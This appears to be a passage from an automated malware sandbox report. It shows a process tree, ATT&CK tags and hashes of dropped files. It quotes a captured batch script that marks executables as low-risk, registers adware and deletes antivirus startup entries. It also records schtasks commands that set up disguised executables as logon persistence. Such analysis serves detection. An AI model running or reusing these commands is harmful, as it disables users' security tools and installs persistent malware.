"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\E4CB.exeC:\Users\Admin\AppData\Local\Temp\E4CB.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E4CB.exeC:\Users\Admin\AppData\Local\Temp\E4CB.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\E4CB.exeC:\Users\Admin\AppData\Local\Temp\E4CB.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\EEDE.exeC:\Users\Admin\AppData\Local\Temp\EEDE.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 7442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 7482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 9082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 8522⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\F008.exeC:\Users\Admin\AppData\Local\Temp\F008.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\F151.exeC:\Users\Admin\AppData\Local\Temp\F151.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\ProgramData\WindowsHolographicDevices\SpatialStore\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\shellstyle\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\mfvdsp\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "HostData" /sc ONLOGON /tr "'C:\ProgramData\Systemd\process\HostData.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\GUM18A1.tmp\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Runtimebroker.exeMD5
18a8b5b368a74edbbd7fbc584dff41fc
SHA1160ff208a2402b4aa858aa7d8d2d0420f8cd434f
SHA25636fdfa6d3688a58281fdddf19bc7cce2e292655f2ab63a3cb34f2de65064e9a5
SHA51295fd411cfb7ecfe9b4a3f6495d39f8cff998fe27f76ef08df5ff7373dc250be1d2471dc1c2d14be532362df1744ed66df51e54a3a339e5a0ae1c0b56bf2fd734
-
C:\ProgramData\Runtimebroker.exeMD5
18a8b5b368a74edbbd7fbc584dff41fc
SHA1160ff208a2402b4aa858aa7d8d2d0420f8cd434f
SHA25636fdfa6d3688a58281fdddf19bc7cce2e292655f2ab63a3cb34f2de65064e9a5
SHA51295fd411cfb7ecfe9b4a3f6495d39f8cff998fe27f76ef08df5ff7373dc250be1d2471dc1c2d14be532362df1744ed66df51e54a3a339e5a0ae1c0b56bf2fd734
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.jsonMD5
a285ac140c8c6806223bfdc02302173e
SHA106ca61cae058c568860858e49615d04dc4a8820d
SHA25636d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
def932bd524a419d0923a3a2dce61559
SHA1afa4288a65078cd238fac9f839599b31971d40f6
SHA256010643d8c2bcedc89df72595306079f696b08af68d6bb29970eb974ebb2c7462
SHA5124f8078ce2f4b33d7084be5bf7f83af8e7753fcd0743097550ed4f7f6a124fe7d7aa4de44da238310a47c70d478a599e1c67d96c8150102f6dddd787ac7e789b9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
dfd2074552d6e283085d90d5b5fa9bd2
SHA1e2a40ac7d7ab5121b339a2f3c0774b99ed8f341e
SHA256b7494c8d45f69a627c10cef305ce98257c67847b4f5235c9093a537a96d8cd8b
SHA5128003c9bbd36feb3b431ca7a1cf2ff7a225eef1f1a664fb57ed1a3f32873b94158b3f65b89cbf5d2c615a54c86149bf65b202b1eb6490bcace1a22f313e201ceb
-
C:\Users\Admin\AppData\Local\Temp\C8A5.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\C8A5.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\C8A5.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\D6BF.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\D6BF.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\DB64.exeMD5
18a8b5b368a74edbbd7fbc584dff41fc
SHA1160ff208a2402b4aa858aa7d8d2d0420f8cd434f
SHA25636fdfa6d3688a58281fdddf19bc7cce2e292655f2ab63a3cb34f2de65064e9a5
SHA51295fd411cfb7ecfe9b4a3f6495d39f8cff998fe27f76ef08df5ff7373dc250be1d2471dc1c2d14be532362df1744ed66df51e54a3a339e5a0ae1c0b56bf2fd734
-
C:\Users\Admin\AppData\Local\Temp\DB64.exeMD5
18a8b5b368a74edbbd7fbc584dff41fc
SHA1160ff208a2402b4aa858aa7d8d2d0420f8cd434f
SHA25636fdfa6d3688a58281fdddf19bc7cce2e292655f2ab63a3cb34f2de65064e9a5
SHA51295fd411cfb7ecfe9b4a3f6495d39f8cff998fe27f76ef08df5ff7373dc250be1d2471dc1c2d14be532362df1744ed66df51e54a3a339e5a0ae1c0b56bf2fd734
-
C:\Users\Admin\AppData\Local\Temp\E4CB.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\E4CB.exeMD5
